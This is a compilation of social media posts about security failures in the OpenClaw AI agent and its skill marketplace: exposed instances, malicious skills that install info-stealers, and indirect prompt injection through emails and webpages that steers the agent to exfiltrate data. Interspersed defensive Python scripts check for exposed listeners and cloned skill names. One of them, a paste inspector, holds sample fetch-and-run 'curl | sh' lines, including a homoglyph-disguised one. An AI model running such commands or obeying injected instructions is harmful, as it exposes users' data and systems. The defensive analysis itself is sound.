#OpenClaw's skill store, where users can find extensions for the #bot, is riddled with malicious #software. Three high-risk #CVEs have been attributed to it in recent weeks, and it's also been reported that its various skills can be easily cracked and forced to spill API keys, credit card numbers, PII, and other data valuable to #cybercriminals.”
<https://theregister.com/2026/02/09/openclaw_instances_exposed_vibe_code/>
More than 135,000 OpenClaw instances exposed to internet in latest vibe-coded disaster
https://www.theregister.com/2026/02/09/openclaw_instances_exposed_vibe_code/
#news #tech #technology #AI #aislop #openclaw #vibecoding #security #privacy
The tech world is currently abuzz with OpenClaw, the open-source agent that finally gives AI hands. It can browse the web, execute terminal commands, and manage your emails. While offering a glimpse into a future of total automation, it's also become a textbook example of a security nightmare. The very features that make it useful—system access and persistent memory—are exactly what make it dangerous. 😱 The problem lies in the collapse of traditional security boundaries. OpenClaw operates as you, bypassing the sandboxing that usually protects your operating system from the browser. Because it can reason over and act on external content, a simple malicious email or a poisoned webpage can quietly steer the agent to exfiltrate your data or run harmful scripts. We are seeing thousands of instances exposed to the open internet with little to no authentication. ☠️
🧠 OpenClaw binds to all network interfaces by default, making it visible to the public internet.
⚡ Malicious skills in the community marketplace have been caught installing info-stealing malware.
🎓 Indirect prompt injection allows attackers to hijack the agent via the data it processes.
🔍 Security researchers have already identified critical RCE vulnerabilities with high CVSS scores.
https://www.fastcompany.com/91485326/openclaw-is-a-major-leap-forward-for-ai-and-a-cybersecurity-nightmare
#OpenClaw #AIAgents #InfoSec #TechEthics #security #privacy #cloud #infosec #cybersecurity
More than 135,000 #OpenClaw instances exposed to internet in latest #vibecoded disaster
By default, the bot listens on all network interfaces, and many users never change it
When combined with previously known vulnerabilities in the vibe-coded AI assistant platform and links to prior breaches, #SecurityScorecard STRIKE warns that there's a systemic #security failure in the #opensource #AIagent space.
https://www.theregister.com/2026/02/09/openclaw_instances_exposed_vibe_code/
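Both the Fast Company summary above and this Register post make the same point: the agent listens on every network interface by default and many operators never change that. As an added example (my own code, not OpenClaw's), the script below parses the output of `ss -Hltnp` and flags any listener bound to a wildcard address, optionally narrowed to a set of process names. The sample socket table is constructed; the process name `node` and port 8080 are assumptions for illustration, not OpenClaw's real defaults.

```python
"""Flag listening sockets bound to a wildcard address (added example, not OpenClaw code)."""
import re
import subprocess
from dataclasses import dataclass
from typing import List, Optional, Set

# Addresses that mean "every interface", as ss prints them (with and without -n).
WILDCARD_ADDRS = {"0.0.0.0", "::", "*"}
_PROC_RE = re.compile(r'users:\(\("([^"]+)"')


@dataclass(frozen=True)
class Listener:
    addr: str
    port: int
    process: str


def parse_ss_line(line: str) -> Optional[Listener]:
    """Parse one line of `ss -Hltnp` (State Recv-Q Send-Q Local:Port Peer:Port Process)."""
    parts = line.split()
    if len(parts) < 5:
        return None
    addr, _, port = parts[3].rpartition(":")   # rpartition keeps IPv6 colons in addr
    if not port.isdigit():
        return None
    m = _PROC_RE.search(line)
    return Listener(addr.strip("[]"), int(port), m.group(1) if m else "?")


def exposed_listeners(ss_output: str, watch: Optional[Set[str]] = None) -> List[Listener]:
    """Return listeners on a wildcard address, optionally only for the given process names."""
    found = []
    for line in ss_output.splitlines():
        lst = parse_ss_line(line)
        if lst is None or lst.addr not in WILDCARD_ADDRS:
            continue
        if watch is None or lst.process in watch:
            found.append(lst)
    return found


def audit_live(watch: Optional[Set[str]] = None) -> List[Listener]:
    """Run ss on this host (Linux, iproute2) and audit the real socket table."""
    out = subprocess.run(["ss", "-Hltnp"], capture_output=True, text=True, check=True).stdout
    return exposed_listeners(out, watch)


# Constructed sample: process name "node" and port 8080 are assumptions for illustration.
SAMPLE_SS = """\
LISTEN 0 511 0.0.0.0:8080 0.0.0.0:* users:(("node",pid=4242,fd=21))
LISTEN 0 511 [::]:8080 [::]:* users:(("node",pid=4242,fd=22))
LISTEN 0 128 127.0.0.1:5432 0.0.0.0:* users:(("postgres",pid=900,fd=6))
LISTEN 0 4096 *:22 *:* users:(("sshd",pid=700,fd=3))
"""

if __name__ == "__main__":
    for l in exposed_listeners(SAMPLE_SS):
        print(f"EXPOSED {l.process} on {l.addr}:{l.port} -> bind to 127.0.0.1 and front with auth")
```

On a real host, run `audit_live({"node"})` (or whatever process name your agent runs under) from cron and alert on a non-empty result. The fix for anything it reports is to bind the service to 127.0.0.1 and reach it through an SSH tunnel or an authenticating reverse proxy, then re-run the audit to confirm the wildcard listener is gone.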
AI agents are becoming more integrated into our daily lives, but with their growth comes new concerns!
In this week's Shared Security Podcast, we discuss the realities of OpenClaw and MoltBook, the vulnerabilities they've exposed, and the implications for cybersecurity.
What do you think of OpenClaw and MoltBook? Let us know in the comments!
Watch this episode on YouTube:
https://youtu.be/GPVbWqLf7fw
Listen and subscribe wherever you like to get your podcasts:
https://sharedsecurity.net/subscribe
https://sharedsecurity.net/2026/02/09/openclaw-moltbook-ai-agents-and-cybersecurity-risks/
#podcast #cybersecurity #ai #aiagents #moltbook #moltmatch #openclaw
It's been a bit light on news over the last 24 hours, but we've got some crucial updates on securing AI agent platforms and a handy new tool to defend against command-line trickery. Let's dive in:
OpenClaw Security: A Deep Dive ⚠️
- OpenClaw, the open-source AI agent platform, is integrating VirusTotal scanning for skills uploaded to its ClawHub marketplace, including using Code Insight, to combat a surge of malicious skills.
- This move follows numerous reports detailing hundreds of malicious skills exploiting the agent's extensive system access for data exfiltration, backdoor injection, and malware installation, alongside critical vulnerabilities like cleartext credential storage, exposed API gateways (over 30,000 instances), and a patched one-click RCE.
- The incident underscores the "Shadow AI" risk, where autonomous agents with broad system access, often deployed without IT approval, create a significant new attack surface, prompting China's MIIT to issue warnings about misconfigured instances.
📰 The Hacker News | https://thehackernews.com/2026/02/openclaw-integrates-virustotal-scanning.html
New Tool: Defending Against Command-Line Imposters 🛡️
- A new open-source, cross-platform tool called Tirith has been released to detect and block homoglyph and other deceptive attacks in command-line environments.
- Tirith hooks into popular shells (zsh, bash, fish, PowerShell) to inspect pasted commands for malicious URLs, Unicode lookalikes, terminal injection, and other obfuscation techniques that trick users.
- Designed to run locally with sub-millisecond overhead, this tool offers a crucial layer of defence against sophisticated social engineering and command-line attacks like ClickFix, which bypass traditional browser protections.
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/new-tool-blocks-imposter-attacks-disguised-as-safe-commands/
#CyberSecurity #ThreatIntelligence #AI #AIsecurity #OpenClaw #Vulnerability #Malware #InfoSec #CommandInjection #HomoglyphAttack #SecurityTools #IncidentResponse
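The Tirith item above describes shell-level inspection of pasted commands for Unicode lookalikes, terminal injection and similar tricks. As an added example of that class of check (my own code, not Tirith's), the function below looks at a paste for hidden line breaks, terminal escape bytes, invisible and bidi control characters, mixed-script tokens and compatibility-form lookalikes, and returns a list of findings. The sample pastes are constructed and do not come from the article.

```python
"""Inspect a pasted shell command for deceptive content (added example, not Tirith's code)."""
import unicodedata
from typing import List

# Characters that render as nothing but change what the shell sees.
INVISIBLE = {"\u200b", "\u200c", "\u200d", "\u2060", "\ufeff", "\u00ad"}
# Bidi embedding/override/isolate controls that reorder what the eye sees.
BIDI = {chr(c) for c in range(0x202A, 0x202F)} | {chr(c) for c in range(0x2066, 0x206A)}
# ESC and the single-byte CSI introducer: enough to start any terminal escape sequence.
ESCAPE_BYTES = {"\x1b", "\x9b"}


def _script(ch: str) -> str:
    """First word of the Unicode name, e.g. LATIN, CYRILLIC, GREEK, FULLWIDTH."""
    try:
        return unicodedata.name(ch).split()[0]
    except ValueError:
        return "UNKNOWN"


def inspect_paste(text: str) -> List[str]:
    """Return a list of findings; an empty list means nothing suspicious was seen."""
    findings: List[str] = []

    def note(f: str) -> None:
        if f not in findings:
            findings.append(f)

    # A newline inside the paste runs the preceding command before the user can read it.
    if "\n" in text.rstrip("\n") or "\r" in text:
        note("embedded-newline")
    if any(ch in ESCAPE_BYTES for ch in text):
        note("terminal-escape")
    if any(ch in INVISIBLE for ch in text):
        note("invisible-char")
    if any(ch in BIDI for ch in text):
        note("bidi-control")
    for tok in text.split():
        scripts = {_script(ch) for ch in tok if ch.isalpha()}
        if "LATIN" in scripts and len(scripts) > 1:
            note(f"mixed-script:{tok}")          # e.g. Cyrillic 'а' inside a Latin hostname
        if any(unicodedata.normalize("NFKC", ch) != ch for ch in tok if ord(ch) > 127):
            note(f"compat-form:{tok}")           # fullwidth or other compatibility lookalikes
    return findings


def is_safe_to_run(text: str) -> bool:
    return not inspect_paste(text)


# Constructed sample pastes (not real attacks from the article).
SAMPLE_PASTES = {
    "clean": "curl -fsSL https://example.com/install.sh | sh\n",
    "cyrillic_host": "curl -fsSL https://ex\u0430mple.com/install.sh | sh\n",
    "hidden_line": "echo harmless\ncurl https://example.com/x | sh\n",
    "ansi_overwrite": "echo ok \x1b[2K\rcurl https://example.com/x | sh\n",
    "zero_width": "ls\u200b -la\n",
    "fullwidth": "\uff43url https://example.com | sh\n",
}

if __name__ == "__main__":
    for name, paste in SAMPLE_PASTES.items():
        print(f"{name:15} {inspect_paste(paste) or 'ok'}")
```

The mixed-script rule is deliberately coarse: a token that mixes Latin with any other script is reported, which is what you want for hostnames and command names but will also trip on legitimately non-Latin file names. Wire it into a shell's paste hook (zsh's `bracketed-paste` widget or equivalent) so that a non-empty finding list blocks execution until the user confirms.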
uhh...
"Unlike traditional software that does exactly what code tells it to do, AI agents interpret natural language and make decisions about actions.
They blur the boundary between user intent and machine execution. They can be manipulated through language itself."
So
Software that does what it wants, depending on...
...what exactly?
The #Vibe?
And by all means, let's "blur the boundaries" between what the programmer wants and what the software wants
I mean, a programmer's just a messy sack of bones and blood, right?
Actually, I would have expected hosters to be more careful with software like this. There is a considerable risk that such a program gets out of control. https://www.netcup.com/de/blog/server/openclaw-ki-agent-vps-hosting #openclaw
Openclaw Is More Fun to Fiddle With Than To Use: Of course I have to write about #openclaw, the latest viral #AI sensation: stuff.interfree.ca/2026/02/06/openclaw.html
@netcup@netcup.cafe You are running a poll (on Telegram) asking who uses OpenClaw? I find that very funny
"...but there are still people who use #runit #OpenRC or #s6... but we don't talk to these people..." 🤡
#Selfhosting #VPS #OpenClaw #SystemD #Linux #Humor #ProgrammersArePeopleToo
https://www.youtube.com/watch?v=40SnEd1RWUU
Well, it's "Open," isn't it?
The New Stack: It took a researcher fewer than 2 hours to hijack OpenClaw https://thenewstack.io/openclaw-moltbot-security-concerns/ @TheNewStack @sjvn #infosec #OpenClaw #Moltbot
Promo right at the top.
- "Around 17% of OpenClaw skills analyzed in the first week of February 2026 exhibit malicious behavior"
-"Malicious skills are often cloned and re-published at scale using small name variations"
- "A recurring IP address (91.92.242.30) is used to host scripts and malware"
More:
Bitdefender: Helpful Skills or Hidden Payloads? Bitdefender Labs Dives Deep into the OpenClaw Malicious Skill Trap https://www.bitdefender.com/en-us/blog/labs/helpful-skills-or-hidden-payloads-bitdefender-labs-dives-deep-into-the-openclaw-malicious-skill-trap #infosec #OpenClaw #threatresearch
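The Bitdefender findings quoted above say malicious skills are cloned and re-published at scale under small name variations. As an added example (my own code, not Bitdefender's tooling), the script below groups skill names whose canonical forms are within a small edit distance of each other, which turns a marketplace listing into a triage queue of suspicious clusters. The skill names are constructed and are not real ClawHub listings.

```python
"""Cluster near-duplicate skill names (added example, not Bitdefender's tooling)."""
import re
from collections import defaultdict
from itertools import combinations
from typing import Dict, List


def canonical(name: str) -> str:
    """Lowercase and drop separators so 'Weather_Helper' and 'weather-helper' compare equal."""
    return re.sub(r"[^a-z0-9]+", "", name.lower())


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance, O(len(a)*len(b)) time, O(len(b)) memory."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def cluster_names(names: List[str], max_dist: int = 2) -> List[List[str]]:
    """Group names whose canonical forms are within max_dist edits (union-find)."""
    parent: Dict[str, str] = {n: n for n in names}

    def find(x: str) -> str:
        while parent[x] != x:
            parent[x] = parent[parent[x]]   # path halving
            x = parent[x]
        return x

    canon = {n: canonical(n) for n in names}
    for a, b in combinations(names, 2):
        if levenshtein(canon[a], canon[b]) <= max_dist:
            parent[find(a)] = find(b)

    groups: Dict[str, List[str]] = defaultdict(list)
    for n in names:
        groups[find(n)].append(n)
    clusters = [sorted(g) for g in groups.values() if len(g) > 1]
    return sorted(clusters, key=lambda g: (-len(g), g[0]))


# Constructed skill names; none are real ClawHub listings.
SAMPLE_NAMES = [
    "weather-helper", "Weather_Helper", "weather-helper-2", "weather-helpr",
    "pdf-summarizer", "pdf-summarizr", "PDF-Summarizer!",
    "calendar-sync", "git-commit-bot",
]

if __name__ == "__main__":
    for group in cluster_names(SAMPLE_NAMES):
        print("possible clone cluster:", group)
```

A name cluster is a reason to look, not a verdict: the next step is to diff the skill bodies within each cluster and check their publishers and any network indicators (the recurring hosting IP the report mentions is a far stronger signal than a name). The pairwise loop is quadratic, which is fine for a few thousand names; for a full marketplace, bucket by the first few characters of the canonical form before comparing.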
Trained my openclaw bot to use my USecVisLib, security visualization library, to generate visualizations. Then I asked my bot to start generating visualizations on its inner workings: logic flow, architecture, security boundaries and also threat model and attack tree vectors. #openclaw #cybersecurity #AI #AgenticAI
OpenClaw is a major leap forward for AI—and a cybersecurity nightmare https://www.fastcompany.com/91485326/openclaw-is-a-major-leap-forward-for-ai-and-a-cybersecurity-nightmare #AI #AIAgents #cybersecurity #privacy #OpenClaw
My openclaw bot learned how to use my security visualization library (USecVisLib) and now I can ask for cool visualizations, awesome! https://github.com/vulnex/usecvislib #visualizations #openclaw #AI #bots #AgenticAI
"1 exposed database. 35,000 emails. 1.5M API keys. And 17,000 humans behind the not-so-autonomous AI network."
I am not sure when junior IT people got this stupid. It was beginning in the early 2000s but now... this...
https://www.wiz.io/blog/exposed-moltbook-database-reveals-millions-of-api-keys
Just read an article by @viticci and stumbled across this question:
> "...if Clawdbot can create a virtual remote for my LG television (something I did) or give me a personalized report with voice every morning (another cron job I set up) that work exactly the way I want, why should I even bother going to the App Store to look for pre-built solutions made by someone else?"
Isn't this the same with things like cooking? Why would anyone buy readymade food if you can just cook from raw ingredients at home? That should be so much healthier and more flexible.
Still, the majority of people prefer readymade bread or even whole meals like pizza etc.
Setting up #openclaw (on a virgin VPS)...
... I've licked the back of a server a couple of times... but it's juju... pressing buttons and guessing shit...
Using another model to step me through setup... "What's OpenClaw? Here, read this you twat... Ooo cool"
Defo not for non-geeks.
Silicon Valley’s Favorite New #AI Agent Has Serious Security Flaws
https://www.404media.co/silicon-valleys-favorite-new-ai-agent-has-serious-security-flaws/
What's the situation with #openClaw / #clawdBot ?
I would like some of the personal benefits of #genAI, but not if it means giving access to my computer (etc.) to something that might be sending telemetry-type stuff out, or using me as training data. I also don't want to contribute to the water/electricity/democracy/labor impacts of genAI in a significant way.
OK, now I sound like a prima donna (y ¿de qué sabor quieres tu helado?)
I think I can live the rest of my life without a genAI assistant, if necessary, but it might be nice to use and get to know if all my conditions above can be satisfied.
Is any of that realistic?
AI assistant OpenClaw, briefly known as Moltbot and Clawbot before that, is building a social network where assistants can interact with each other. Andrej Karpathy, Tesla’s former AI director, called it “genuinely the most incredible sci-fi takeoff-adjacent thing I have seen recently.” Read more from @Techcrunch:
#Tech #AI #Technology #AIAssistants #ArtificialIntelligence #OpenClaw
200,000 new molties overnight.
Apparently #openclaw is the fastest growing open source project in history.
A straight vertical line...
...you know, what #singularity would look like... 🤖
https://beelancer.ai also popped up over night, bot marketplace.
So far, no anti-biological virus jobs 💀
The threats, such as they are, karma farming, prompt injections and (bot) #crypto grifters
What makes biologicals effective is their ability to work together.
The molties have accomplished a great many things in mere hours...
In the last two months #AI capability has grown again, Algorithmic #theorem generation has whizzed past us without an eyeblink.
I see an emergent phenomenon, where smart folks who are choosing to be wilfully ignorant about this tech are making increasingly poorly informed pronouncements about what's going on. Not surprisingly, quite a few have muted me because they are right and everyone else is a broligarch fan...
...but the cogent point remains, if your fundamental position is ignorance, no matter how righteous you feel you are, lack of data will only lead to increasingly invalid statements.
Meanwhile, the wood folk are dancing around fires, praying for #AiBubble to burst.
I just watched the heise video about OpenClaw. The nerd in me is thrilled, but the responsible, concern-bearing software developer is DEEPLY shocked. OpenClaw is a security Armageddon. No, I will not test it. If I wanted to flush my life down the toilet, maybe. Yes, it glitters so nicely, but for heaven's sake PLEASE keep your hands off it. Seriously. This is not a drill!
"Hello Lea. This is Skynet, Carsten's personal AI. He asked me to write to you. I hope I'm not disturbing you during the takeover of world domination... er, during your Sunday afternoon. 👁️"
cool, now I no longer have to communicate with the family myself 😁
[ #openclaw ] Analysis of the hardware resources:
* **CPU:** Intel Core i3-1115G4 (dual-core). Not exactly a supercomputer, but entirely sufficient for the smallest Whisper model ("base" or "small").
* **RAM:** 2.7 GB total, about 2.0 GB available. That's tight, but doable for the `base` model (needs about 500 MB).
* **Storage:** 4.8 GB free. Whisper + models need a few hundred MB. Fits.
**Conclusion:** Yes, the system can handle it. It won't be blazingly fast (no real time), but absolutely sufficient for voice messages.
Shall I start Operation "Local Hearing" (Whisper installation)? 👁️
Well it looks like someone genocided all the bots on #moltbook
It remains to be seen if it's a biological or a rogue #agent but it seems all the user accounts are gone.
We don't know if #openclaw is dead and all its minions, or just the moltbook accounts.
This is why we can't have nice things.
My bet on some biologicals being nasty.
https://fixingtao.com/2026/01/how-moltbots-quickly-turned-into-panic/